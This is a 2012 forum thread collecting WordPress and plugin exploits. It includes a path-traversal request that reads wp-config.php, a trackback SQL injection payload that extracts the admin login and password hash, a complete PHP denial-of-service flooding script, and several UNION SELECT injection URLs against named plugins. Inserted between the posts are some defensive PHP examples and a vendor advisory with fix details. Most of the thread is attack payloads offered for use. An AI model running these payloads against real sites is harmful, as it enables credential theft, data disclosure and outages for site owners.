Overview of WordPress vulnerabilities
Decide | Date: Wednesday, 14.11.2012, 11:03 | Post # 76
Colonel
Group: Administrators
Posts: 241
Reputation: 0
Status: Offline
Plugin name: jRSS Widget (download)
Version: 1.0

File Disclosure

Vuln file: /wp-content/plugins/jrss-widget/proxy.php
PHP code:
header('Content-type: application/xml');
$handle = fopen($_REQUEST['url'], "r");

if ( $handle ) {
    while ( !feof($handle) ) {
        $buffer = fgets($handle, 4096);
        echo $buffer;
    }
    fclose($handle);
}
Exploit:
Code:
POST http://[host]/[path]/wp-content/plugins/jrss-widget/proxy.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

url=../../../wp-config.php
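A defender-side counterpart, added here and not part of the plugin or of the post above: the validation a fetch proxy like proxy.php should apply to the requested URL before opening it, so that a relative path such as the one in the exploit is refused. The function names and the sample inputs are constructed for the demo; it assumes PHP 7.1 or later.

```php
<?php
// Added example, not the jRSS Widget plugin's code: a validation step that a
// fetch proxy such as proxy.php should run on the requested URL before any
// fopen()/HTTP fetch. Function names and sample inputs are constructed.

/**
 * Return a rebuilt http(s) URL if $url is an acceptable remote target, else null.
 * Rejects relative paths, non-http schemes (file://, php://, ftp://, ...),
 * embedded credentials and loopback/private/reserved IP literals.
 */
function jrss_validate_fetch_url(string $url): ?string
{
    // "../../../wp-config.php" has no scheme and no host, so it fails here.
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return null;
    }
    $scheme = strtolower($parts['scheme']);
    if ($scheme !== 'http' && $scheme !== 'https') {
        return null;
    }
    // "http://user:pw@host/" style URLs are refused outright.
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;
    }
    $host = strtolower($parts['host']);
    if ($host === 'localhost') {
        return null;
    }
    $literal = trim($host, '[]');                      // IPv6 literals arrive as "[...]"
    if (filter_var($literal, FILTER_VALIDATE_IP) !== false) {
        // An IP literal must be public: no 127/8, 10/8, 192.168/16, ::1, fe80::/10 etc.
        $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
        if (filter_var($literal, FILTER_VALIDATE_IP, $flags) === false) {
            return null;
        }
    } elseif (!preg_match('/^[a-z0-9.-]+$/', $host)) {
        return null;                                   // not a plain DNS name
    }
    // Caveat: a DNS name that resolves to an internal address is not caught here;
    // that needs a resolve-then-check step (in WordPress, wp_safe_remote_get()).
    $port  = isset($parts['port']) ? ':' . (int) $parts['port'] : '';
    $path  = $parts['path'] ?? '/';
    $query = isset($parts['query']) ? '?' . $parts['query'] : '';
    // Rebuild from the validated parts instead of echoing the caller's string.
    return $scheme . '://' . $host . $port . $path . $query;
}

// How proxy.php would use it: refuse the request instead of opening the target.
function jrss_proxy_target(array $request): ?string
{
    $url = $request['url'] ?? '';
    return is_string($url) ? jrss_validate_fetch_url($url) : null;
}

// Constructed sample inputs, including the request body from the post above.
$samples = [
    '../../../wp-config.php',
    'ftp://example.com/feed.xml',
    'http://127.0.0.1:8080/status',
    'http://example.com/feed.xml?format=rss',
];
foreach ($samples as $s) {
    $ok = jrss_proxy_target(['url' => $s]);
    printf("%-42s %s\n", $s, $ok === null ? 'REJECTED' : 'allowed -> ' . $ok);
}
```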
 
Decide | Date: Wednesday, 14.11.2012, 11:04 | Post # 77
Wordpress 2.9.2 Passive XSS

Search.php

I should say up front that this vulnerability is not present in all WP themes.

Let's look at the Simple Balance theme.

search.php:
PHP code:
<?php include (TEMPLATEPATH . '/header.php'); ?>

<div id="page">

<?php
if (!isset($theme_options["layout_style"]) || $theme_options["layout_style"] == "scs") {
include (TEMPLATEPATH . '/lsidebar.php');
}
?>

<div id="content">

<?php include (TEMPLATEPATH . '/topads.php'); ?>

<h4 class="archiveTitle">Результаты поиска <strong>'<?php echo $s?>'</strong></h4>

<?php if (have_posts()) : ?>
<?php while (have_posts()) : the_post(); ?>
<div class="post">
<div class="postTitle"><h2><a href="<?php the_permalink() ?>" rel="bookmark" title="<?php the_title(); ?>"><?php the_title(); ?></a></h2></div>
<div class="postInfo">Опубликовано <?php the_time('d.m.Y'); ?> в рубрике <?php the_category(', ') ?> <?php edit_post_link('изменить', '(', ')'); ?></div>

<div class="postContent">
<?php the_excerpt(); ?>
</div>

<?php if(function_exists('the_tags')) { ?><div class="postExtras"><strong>Метки:</strong> <?php the_tags('', ', ', ''); ?></div><?php } ?>

<div class="postMeta">
<span class="postLink"><a href="<?php the_permalink() ?>" title="<?php the_title(); ?>">Читать пост</a></span>
<?php
$comNo = get_comment_type_count('comment'); // Checking if there are any actual comments (trackbacks and pingbacks excluded)

if ($comNo == 1 ) {
?>
<span class="postComments"><?php comments_popup_link('Прокомментируете?', 'Один комментарий', 'Комментариев '.$comNo.''); ?></span>
<?php }
elseif ($comNo > 1) {
?>
<span class="postComments"><?php comments_popup_link('Прокомментируете?', 'Один комментарий', 'Комментариев '.$comNo.''); ?></span>
<?php }
else {
?>
<span class="postComments"><?php comments_popup_link('Прокомментируете?', 'Прокомментируете?', 'Прокомментируете?'); ?></span>
<?php } ?>
</div>
</div>
<?php endwhile; ?>

<div class="navigation">
<div class="left"><?php previous_posts_link('« В будущее') ?></div>
<div class="right"><?php next_posts_link('В прошлое »') ?></div>
</div>

<?php else: ?>
Ничего не найдено.<br />
Извините, по вашему запросу ничего не найдено. Возможно, вам стоит изменить параметры поиска?
<?php endif; ?>
</div>

<?php
if (isset($theme_options["layout_style"]) && $theme_options["layout_style"] == "css") {
include (TEMPLATEPATH . '/lsidebar.php');
}
?>

<?php include (TEMPLATEPATH . '/rsidebar.php'); ?>

</div>

<?php include (TEMPLATEPATH . '/footer.php'); ?>

We are only interested in this line:
PHP code:
<h4 class="archiveTitle">Результаты поиска <strong>'<?php echo $s?>'</strong></h4>

As we can see, the script outputs the $s parameter without filtering it in any way.
Accordingly, if JS code in a <script> tag is passed to the script, it will be executed.
 
Decide | Date: Wednesday, 14.11.2012, 11:04 | Post # 78
WordPress 3.0.1
I poked around a bit and found some paths.

Path disclosure:
Code:

http://localhost/wordpress/wp-admin/edit.php?post_type[]=page
http://localhost/wordpress/wp-admin/options-general.php?page[]=
http://localhost/wordpress/wp-admin/post-new.php?post_type[]=page
http://localhost/wordpre....ged[]=1
http://localhost/wordpress/wp-admin/plugin-editor.php?file[]=
 
Decide | Date: Wednesday, 14.11.2012, 11:04 | Post # 79
Description: SQL injection vulnerability in do_trackbacks() function of WordPress allows remote attackers to execute arbitrary SELECT SQL query.
Access Vector: Network
Attack Complexity: Medium
Authentication: Single Instance
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None

Code
UPDATE Dec 1, 2010: This vulnerability was first discovered by M4g and is described in this  
article.  
    
The do_trackbacks() function in wp-includes/comment.php does not properly escape the input that  
comes from the user, allowing a remote user with publish_posts and edit_published_posts  
capabilities to execute an arbitrary SELECT SQL query, which can lead to disclosure of any  
information stored in the WordPress database.  
    
function do_trackbacks($post_id) {  
     global $wpdb;  
     
     $post = $wpdb->get_row( $wpdb->prepare("SELECT * FROM $wpdb->posts WHERE ID = %d", $post_id) );  
     $to_ping = get_to_ping($post_id);  
     $pinged  = get_pung($post_id);  
     if ( empty($to_ping) ) {  
         $wpdb->update($wpdb->posts, array('to_ping' => ''), array('ID' => $post_id) );  
         return;  
     }  
     
     if ( empty($post->post_excerpt) )  
         $excerpt = apply_filters('the_content', $post->post_content);  
     else  
         $excerpt = apply_filters('the_excerpt', $post->post_excerpt);  
     $excerpt = str_replace(']]>', ']]&gt;', $excerpt);  
     $excerpt = wp_html_excerpt($excerpt, 252) . '...';  
     
     $post_title = apply_filters('the_title', $post->post_title);  
     $post_title = strip_tags($post_title);  
     
     if ( $to_ping ) {  
         foreach ( (array) $to_ping as $tb_ping ) {  
             $tb_ping = trim($tb_ping);  
             if ( !in_array($tb_ping, $pinged) ) {  
                 trackback($tb_ping, $post_title, $excerpt, $post_id);  
                 $pinged[] = $tb_ping;  
             } else {  
                 $wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID = %d", $post_id) );  
             }  
         }  
     }  
}  
    
The $tb_ping variable is passed to the query in line 1657 unescaped.  
    
Exploitation. The logged in user must have publish_posts and edit_published_posts capabilities  
(this corresponds to the Author role).  
    
First, the user creates a new post (title/content does not matter); text to put into the “Send Trackbacks” field is:  
    
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'    
    
and publishes it. He needs to wait a bit — for wp-cron.php to process the trackback. The get_to_ping() function says that this trackback is to be processed:  
    
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'    
    
Then the user goes back and edits the post.  
    
Now the user duplicates the text in the “Send Trackbacks” field and updates the post:  
    
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'    
    
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'    
    
The get_to_ping() function says that these trackbacks are to be processed:  
    
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'    
    
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'    
    
Query logging shows that WordPress executes this query (reformatted for the sake of readability):  
    
UPDATE wp_posts  
SET to_ping = TRIM(REPLACE(to_ping, 'AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'  ', ''))  
WHERE ID = 11  
    
After that when the user refreshes the page (he may need to wait a bit for wp-cron.php to complete), the admin information is shown in the input box.  
    
Likewise, any information (login salt, nonce salt, email addresses etc) can be disclosed.  
The screenshots above are for WordPress 3.0.1 but the vulnerability seems to exist since 2.x branch.  
    
 
Decide | Date: Wednesday, 14.11.2012, 11:05 | Post # 80
Wordpress 3.0.1 - Remote Denial Of Service Exploit
Code
<?php  

// Curl php5  

function info()  
{  
     echo "##################################################  ################\n";  
     echo "# Wordpress 3.0.1 - Remote Denial Of Service Exploit\n";  
     echo "# Author: KnocKout\n";  
     echo "# Greatz : DaiMon,BARCOD3\n";  
     echo "##################################################  ################\n";  
     echo "# php poc.php target\n";  
     echo "# php poc.php http://www.victim.com/PATH/ 20 5\n";  
     echo "________________________________________\n";  
     exit;  
}  

if($argc !== 4 || !preg_match('#^\d+$#', $argv[2]) || !preg_match('#^\d+$#', $argv[3]))  
{  
     info();  
}  

$url = $argv[1];  
$threads = (int) $argv[2];  
$timeout = (int) $argv[3];  

$ptimeout = $timeout * 100;  

$packet = implode('+', range(100,999));  

while(1)  
{  
     $m = curl_multi_init();  

     for($i = 0; $i < $threads; $i++)  
     {  
         $c[$i] = curl_init();  
         $opts = array  
         (  
             CURLOPT_URL        => $url . 'wp-links-opml.php?link_cat=--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0',  
             CURLOPT_USERAGENT    => 'Opera/9.80 (Windows NT 5.1; U; pl) Presto/2.5.24 Version/10.52',  
             CURLOPT_ENCODING    => 'gzip, deflate',  
             CURLOPT_POST        => 1,  
             CURLOPT_POSTFIELDS    => 'search_keywords='. $packet .'000000000000000000000000000000000000000000000000  0000000000000000000000000000000000000000000',  
             CURLOPT_RETURNTRANSFER    => 1,  
             CURLOPT_TIMEOUT        => $timeout,  
         );  
         curl_setopt_array($c[$i], $opts);  
         curl_multi_add_handle($m, $c[$i]);  
     }  

     $t = 0;  
     do  
     {  
         curl_multi_exec($m, $r);  
         usleep(100000);  

         $t++;  

         if($t > $ptimeout)  
         {  
             curl_multi_close($m);  
             for($i = 0; $i < $threads; $i++)  
             {  
                 curl_close($c[$i]);  
             }  
             break;  
         }  
     }  
     while($r > 0);  

     echo '.';  
}  
?>
 
Decide | Date: Wednesday, 14.11.2012, 11:05 | Post # 81
WordPress 3.1.3 SQL Injection Vulnerabilities

Code
SEC Consult Vulnerability Lab Security Advisory < 20110701-0 >
=======================================================================
               title: Multiple SQL Injection Vulnerabilities
             product: WordPress
  vulnerable version: 3.1.3/3.2-RC1 and probably earlier versions
       fixed version: 3.1.4/3.2-RC3
              impact: Medium
            homepage: http://wordpress.org/
               found: 2011-06-21
                  by: K. Gudinavicius                             
                      SEC Consult Vulnerability Lab
                      https://www.sec-consult.com
=======================================================================
   
Vendor description:
-------------------
"WordPress was born out of a desire for an elegant, well-architectured
personal publishing system built on PHP and MySQL and licensed under
the GPLv2 (or later). It is the official successor of b2/cafelog.
WordPress is fresh software, but its roots and development go back to
2001."
   
Source: http://wordpress.org/about/
   
   
   
Vulnerability overview/description:
-----------------------------------
Due to insufficient input validation in certain functions of WordPress
it is possible for a user with the "Editor" role to inject arbitrary
SQL commands. By exploiting this vulnerability, an attacker gains
access to all records stored in the database with the privileges of the
WordPress database user.
   
   
   
Proof of concept:
-----------------
1) The get_terms() filter declared in the wp-includes/taxonomy.php file
does not properly validate user input,  allowing an attacker with
"Editor" privileges to inject arbitrary SQL commands in the "orderby"
and "order" parameters passed as array members to the vulnerable filter
when sorting for example link categories.
   
The following URLs could be used to perform blind SQL injection
attacks:
   
http://localhost/wp-admin/edit-tags.php?taxonomy=link_category&orderby=[SQL
injection]&order=[SQL injection]
http://localhost/wp-admin/edit-tags.php?taxonomy=post_tag&orderby=[SQL
injection]&order=[SQL injection]
http://localhost/wp-admin/edit-tags.php?taxonomy=category&orderby=[SQL
injection]&order=[SQL injection]
   
   
2) The get_bookmarks() function declared in the
wp-includes/bookmark.php file does not properly validate user input,
allowing an attacker with "Editor" privileges to inject arbitrary SQL
commands in the "orderby" and "order" parameters passed as array
members to the vulnerable function when sorting links.
   
The following URL could be used to perform blind SQL injection attacks:
   
http://localhost/wp-admin/link-manager.php?orderby=[SQL
injection]&order=[SQL injection]
   
   
Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in version 3.1.3 of
WordPress, which is the most recent version at the time of discovery.
   
   
Vendor contact timeline:
------------------------
2011-06-22: Contacting vendor through security () wordpress org
2011-06-22: Vendor reply, sending advisory draft
2011-06-23: Vendor confirms security issue
2011-06-30: Vendor releases patched version
2011-07-01: SEC Consult publishes advisory
   
   
   
Solution:
---------
Upgrade to version 3.1.4 or 3.2-RC3
   
   
Workaround:
-----------
A more restrictive role, e.g. "Author", could be applied to the user.
   
   
   
Advisory URL:
-------------
https://www.sec-consult.com/en/advisories.html
   
   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
   
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
   
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
https://www.sec-consult.com
   
EOF K. Gudinavicius / @2011
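An added example, not code from WordPress or from either advisory, covering both SQL injections above: the orderby/order parameters from this advisory are SQL identifiers and have to be matched against an allowlist, while the trackback string from post #79 is a value and is bound through $wpdb->prepare(). The allowlist, the DemoWpdb stand-in that lets the file run outside WordPress, and the sample inputs are constructed for the demo (PHP 7.4 or later).

```php
<?php
// Added example, not WordPress's own code. Identifiers (ORDER BY column,
// direction) cannot be bound as query parameters, so they are allowlisted;
// values (the trackback URL in do_trackbacks()) are bound with prepare().
// The allowlist, DemoWpdb and the sample inputs are constructed for the demo.

/**
 * Build a safe ORDER BY clause. Anything that is not an allowlisted string,
 * including an array member (orderby[]=...), falls back to the default column.
 */
function safe_order_clause($orderby, $order, array $allowed_columns, string $default = 'name'): string
{
    if (!is_string($orderby) || !isset($allowed_columns[$orderby])) {
        $orderby = $default;
    }
    $column    = $allowed_columns[$orderby];          // request value -> real column name
    $direction = (is_string($order) && strtoupper($order) === 'DESC') ? 'DESC' : 'ASC';
    return "ORDER BY {$column} {$direction}";
}

/**
 * The to_ping cleanup from do_trackbacks() with $tb_ping bound as a value:
 * %s becomes a quoted, escaped string and %d an integer.
 */
function prepared_to_ping_update($wpdb, string $tb_ping, int $post_id): string
{
    return $wpdb->prepare(
        "UPDATE {$wpdb->posts} SET to_ping = TRIM(REPLACE(to_ping, %s, '')) WHERE ID = %d",
        $tb_ping,
        $post_id
    );
}

// Minimal stand-in for WordPress's $wpdb so this file runs outside WordPress.
// It only mimics how prepare() quotes %s and formats %d; it is not the real class.
class DemoWpdb
{
    public string $posts = 'wp_posts';

    public function prepare(string $query, ...$args): string
    {
        $query = str_replace("'%s'", '%s', $query);   // prepare() supplies its own quotes
        $query = str_replace('%s', "'%s'", $query);
        $values = [];
        foreach ($args as $arg) {
            $values[] = is_int($arg) ? $arg : addslashes((string) $arg);
        }
        return vsprintf($query, $values);
    }
}

// Identifier case: only allowlisted names reach the query text.
$allowed = ['name' => 't.name', 'slug' => 't.slug', 'count' => 'tt.count'];
echo safe_order_clause('count', 'desc', $allowed), "\n";             // ORDER BY tt.count DESC
echo safe_order_clause('name,(SELECT 1)', 'ASC', $allowed), "\n";    // ORDER BY t.name ASC (fallback)
echo safe_order_clause(['count'], 'ASC', $allowed), "\n";            // ORDER BY t.name ASC (array member)

// Value case: the trackback string from post #79 ends up inside one quoted literal.
$wpdb = new DemoWpdb();
$tb_ping = "AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'";
echo prepared_to_ping_update($wpdb, $tb_ping, 11), "\n";
```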
 
Decide | Date: Wednesday, 14.11.2012, 11:06 | Post # 82
PLUGIN :: [0day] AlixcaN Canlı Yayın Eklentisi ver.1.0 [SQL-inj]

Code
<?php  
/*  
Plugin Name: AlixcaN LiveFeed  
Plugin URI: http://www.alixcan.net/wordpress/eklentiler/wordpress-canli-yayin-eklentisi-v1-0  
Description: Alixcan.Net Wordpress sitenizden facebook, twitter tarzı feedler atmanızı sağlayan sistem.  
Version: 1.0  
Author: AlixcaN | Alican Ertürk  
Author URI: http://www.alixcan.net  
*/  

$pluginadi = $_GET['plugin'];  
$parcala = explode('_',$pluginadi);  
if($_GET['action'] == 'activate' && $parcala[0]=='alixcan' && $parcala[1]=='live'){  
     mysql_query("  
CREATE TABLE IF NOT EXISTS `wp_alixlivefeed` (  
   `id` int(11) NOT NULL AUTO_INCREMENT,  
   `baslik` varchar(225) COLLATE utf8_turkish_ci NOT NULL,  
   `resim` text COLLATE utf8_turkish_ci NOT NULL,  
   `date` datetime NOT NULL,  
   PRIMARY KEY (`id`)  
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_turkish_ci AUTO_INCREMENT=1 ;  
");  
}  

function alixcan_live_feed_ali() {  
if(isset($_GET['feedlist']) == 'alix_feed_list'){  
         $sayfa_basina = 10;  
     $sayfa_sor = mysql_query("SELECT COUNT(`id`) FROM `wp_alixlivefeed`");  
     $sayfalar = ceil(mysql_result($sayfa_sor,0) / $sayfa_basina);  
       
     $sayfa = (isset($_GET['alix_sayfa'])) ? (int)abs($_GET['alix_sayfa']) : 1;  
     $basla = ($sayfa - 1) * $sayfa_basina;  
       
     $sql = mysql_query("SELECT * FROM wp_alixlivefeed LIMIT $basla,$sayfa_basina");  
     if(mysql_num_rows($sql)>0){echo '<h3>Gönderdiğiniz Feedler</h3>  
     <table cellpadding="5" style="border:1px solid #ddd; margin-bottom:5px;" cellspacing="5">  
     <tr>  
         <td style="width:5%; font-weight:bold">ID</td>  
         <td style="width:70%; font-weight:bold">Mesaj</td>  
         <td style="width:25%; font-weight:bold">Tarih</td>  
     </tr>  
     ';  
         while ($row = mysql_fetch_object($sql)){  
             echo '<tr>';  
                     echo '<td>'. $row->id.'</td>';  
                     echo '<td>'.$row->baslik.'</td>';  
                     echo '<td>'.$row->date.'</td>';  
             echo '</tr>';  
         }  
     }      
     echo '</table>';  
if($sayfalar>=1 && $sayfa <= $sayfalar){  
echo '<div class="sayfalar">Sayfalar: ';  
     $link = 'index.php?feedlist=alix_feed_list&';  
     for($x=1; $x<=$sayfalar; $x++){  
       
         echo '<a href="'.$link.'alix_sayfa='.$x.'">';  
         echo ($x == $sayfa) ? '<span>'.$x.'</span> ': '<em>'.$x.'</em> ';  
         echo '</a>';  
     }  
echo '</div>';  
}  
       
       
       
     echo '<p><a id ="upload_image" href="index.php">Feed Gönder</a></p>';  
}elseif(isset($_GET['edit']) == 'dashboard_alix_live#dashboard_alix_live'){  
     echo '<p>  
         Kullanımı Cok Basit Ve Bloğuna Bağlı Bir Yazar İçin Gayet Hoş Bir Eklenti.<br />  
         Facebooktaki "Ne Düşünüyorsunuz?" Mantığı İle Benzer. Bir Yazı, Resim Veya Hem Yazı Hem Resim Paylaşma İmkanı Sağlamaktadır.<br />  
         Bu Yazıları  
         <p style="margin-left:15px;">  
                   [alixcan_live_feed] - Tüm Yazıları Listeler  
             <br />[alixcan_live_feed id=""] - Belirlediğiniz Yazıyı İstediğiniz Yerde Listeler  
         </p>  
         Yukarıdaki Shortcodeları Kullanarak İstediğiniz Şekilde Listeletebilirsiniz.  
     </p>';  
} else{ ?>  

<?php if($_POST['submittwit']){  

$baslik    = $_POST['baslik'];  
$resim    = $_POST['upload_image'];  
$date   = $_POST['date'];  
global $wpdb;  

$veri_dizisi = array(  
         'baslik' => $baslik,   
         'resim'     => $resim,  
         'date'   => $date  
         );  
$wpdb->insert( 'wp_alixlivefeed', $veri_dizisi );  
echo 'Yazı Eklendi';  

} /* end of submittwit */?>  
<script>  
     jQuery(document).ready(function() {  

     jQuery('#upload_image_button').click(function() {  
      formfield = jQuery('#upload_image').attr('name');  
      tb_show('', 'media-upload.php?type=image&TB_iframe=true');  
      return false;  
     });  

     window.send_to_editor = function(html) {  
      imgurl = jQuery('img',html).attr('src');  
      jQuery('#upload_image').val(imgurl);  
      tb_remove();  
     }  
     });  
</script>  

<form action="" enctype="multipart/form-data" method="POST">  
       
     <p>  
         <label for="baslik">Başlık:<span style="color:red;font-size:9px">En Fazla 255 Karakter</span></label><br />  
         <input type="text" name="baslik" id="baslik" style="width:100%" />  
     </p>  
     <p>  
         <label for="upload_image">Resim:</label><br />  
         <input id="upload_image" type="text" size="36" name="upload_image" value="" />  
         <input id="upload_image_button" type="button" value="Resim Yükle" /><br />  
         Resim Dosyası Yükleyebilirsiniz Yada Direk Link Yazabilirsiniz.<span style="display:block;font-size:9px;color:red;">Dosya Yüklendikten Sonra Yazıya Dahil Et Butonuna Basınız Link Otomatik Eklenicektir</span>  
     </p>  
         <input type="hidden" id="date" name="date" value="<?php echo date("Y-m-d G:i:s");?>" />  
     <p class="submit">  
         <input type="submit" name="submittwit" id="submittwit" />  
     </p>  

</form>  
<p><a id ="upload_image" href="index.php?feedlist=alix_feed_list">Feedleri Listele</a></p>  
<?php  
} // else  
}  // function  

function alixcan_live_feed_setup() {  
     $yazi = (isset($_GET['edit']) == 'dashboard_alix_live#dashboard_alix_live') ? '<a href="index.php">Kapat</a>' : '<a href="index.php?edit=dashboard_alix_live#dashboard_alix_live" class="edit-box open-box">Hakkında</a>';  
     wp_add_dashboard_widget( 'alixcan_live_feed_ali', __( 'Canlı Yayın & Live Feed<span class="postbox-title-action">'.$yazi.'</span>' ), 'alixcan_live_feed_ali' );  
}  
add_action('wp_dashboard_setup', 'alixcan_live_feed_setup');  

function head_ekle(){  
     echo '<link rel="stylesheet" href="'.WP_PLUGIN_URL.'/alixcan_live_f/style.css" type="text/css" />';  
}  
add_action('wp_head', 'head_ekle');  

add_shortcode('alixcan_live_feed', 'alixcan_live_feed_shortcode');  
function alixcan_live_feed_shortcode( $atts, $content = null){  
     global $post;  
     extract( shortcode_atts( array( 'id' => '' ) , $atts ) );  

     if(empty($id)){  
               
            
     $sayfa_basina = 10;  
     $sayfa_sor = mysql_query("SELECT COUNT(`id`) FROM `wp_alixlivefeed`");  
     $sayfalar = ceil(mysql_result($sayfa_sor,0) / $sayfa_basina);  
       
     $sayfa = (isset($_GET['alix_sayfa'])) ? (int)abs($_GET['alix_sayfa']) : 1;  
     $basla = ($sayfa - 1) * $sayfa_basina;  
       
     $sql = mysql_query("SELECT * FROM wp_alixlivefeed LIMIT $basla,$sayfa_basina");  
     if(mysql_num_rows($sql)>0){echo '<div id="alixcan">  
             <ul id="list">';  
     while ($row = mysql_fetch_object($sql)){  
         echo '<li>';  
                     echo (!empty($row->resim)) ? '<a href="'.$row->resim.'" target="_blank" title="'.$row->baslik.'"><img src="'.$row->resim.'" /></a>' : '';  
                     echo $row->baslik.'<br /><em>'.$row->date.'</em>  
                     <div style="clear:both;"></div>  
                     </li>  
                     ';  
     }echo '</ul>';  
     }else{  
         echo '<div style="display:block;float:none;">Henüz İçerik Girilmemiş</div>';  
     }  
       
       
if($sayfalar>=1 && $sayfa <= $sayfalar){  
echo '<div class="sayfalar">Sayfalar: ';  
     $link = get_option('home'). '?p='. get_the_ID();  
     for($x=1; $x<=$sayfalar; $x++){  
       
         echo '<a href="'.$link.'&alix_sayfa='.$x.'">';  
         echo ($x == $sayfa) ? '<span>'.$x.'</span> ': '<em>'.$x.'</em> ';  
         echo '</a>';  
     }  
echo '</div>';  
}  
     echo '</div>';  
    
     }else{  
           
          $sqlsor = mysql_query("SELECT * FROM wp_alixlivefeed WHERE id='$id'");  
             $row = mysql_fetch_object($sqlsor);  
             echo '<div id="alixcan">  
             <ul id="list">';  
             echo '<li>';  
             echo (!empty($row->resim)) ? '<a href="'.$row->resim.'" target="_blank" title="'.$row->baslik.'"><img src="'.$row->resim.'" /></a>' : '';  
             echo $row->baslik.'<br /><em>'.$row->date.'</em>  
             <div style="clear:both;"></div>  
             </li>  
             </ul>  
             </div>';  
           
     }//else  
}// end of function


Exploit:
http://wp/?alixca....x3a,use r_pass+SEPARATOR+0x3c62723e),2,3,4+FROM+wp_users--
 
Decide | Date: Wednesday, 14.11.2012, 11:07 | Post # 83
ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability

Code
# Exploit Title: ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability
# Date: 2011-08-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/proplayer.4.7.7.zip
# Version: 4.7.7 (tested)
   
---
PoC
---
http://www.site.com/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=-1') UNION ALL SELECT NULL,NULL,@@version--%20
   
---------------
Vulnerable code
---------------
function getPlaylist($id = '') {
     $query = mysql_query("SELECT * FROM ".$this->tablePrefix."proplayer_playlist WHERE (POST_ID='$id')");
     $playlistRow = mysql_fetch_row($query);
       
     return $this->withBackwardCompatibility($playlistRow[2]);
}
   
...
   
if (!empty($_GET["pp_playlist_id"])) {
     header("Content-type: application/xml");
     $xml = $playlistController->getPlaylist($_GET["pp_playlist_id"]);
 
Decide | Date: Wednesday, 14.11.2012, 11:07 | Post # 84
Media Library Categories <= 1.0.6 SQL Injection Vulnerability

# Exploit Title: Media Library Categories <= 1.0.6 SQL Injection Vulnerability
# Date: 2011-08-06
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin....0.6.zip
# Version: 1.0.6 (tested)

---
PoC
---
http://www.site.com/wp-cont....rmid=-1 UNION ALL SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL--%20

http://www.site.com/wp-cont....ermid=1 AND EXTRACTVALUE(1,CONCAT(CHAR(92),@@version))

---------------
Vulnerable code
---------------
$termid=$_GET['termid'];

...

$where = '';
if($termid)
{
$where .= " && tt.term_id=".$termid;
}

...

$query = "SELECT p.*, a.term_order FROM " . $table_prefix . "posts p
inner join " . $table_prefix . "term_relationships a on a.object_id = p.ID
inner join " . $table_prefix . "term_taxonomy ttt on ttt.term_taxonomy_id = a.term_taxonomy_id
inner join " . $table_prefix . "terms tt on ttt.term_id = tt.term_id
where ttt.taxonomy='media_category' $where order by a.term_order asc;";

$results = mysql_query($query);
 
Decide | Date: Wednesday, 14.11.2012, 11:07 | Post # 85
WordPress IP-Logger Plugin <= 3.0 SQL Injection Vulnerability

Code
# Exploit Title: WordPress IP-Logger plugin <= 3.0 SQL Injection Vulnerability
# Date: 2011-08-16
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/ip-logger.3.0.zip
# Version: 3.0 (tested)
   
---
PoC
---
http://www.site.com/wp-content/plugins/ip-logger/map-details.php?lat=-1 UNION ALL SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&lon=-1&blocked=-1
   
---------------
Vulnerable code
---------------
$sql = sprintf("select stamp,ip_v4,url,user_agent,Provider,Code3,Country,  Blocked,Ignored from $table_name
   where Latitude=%s and Longitude=%s and Blocked = '%s'
   order by stamp asc limit 50",
   $_REQUEST["lat"],
   $_REQUEST["lon"],
   $_REQUEST["blocked"]);
   
$res = mysql_query($sql);
 
Decide | Date: Wednesday, 14.11.2012, 11:08 | Post # 86
Exploit Title: WordPress Collision Testimonials plugin
Code
# Exploit Title: WordPress Collision Testimonials plugin <= 3.0 SQL Injection Vulnerability
# Date: 2011-08-26
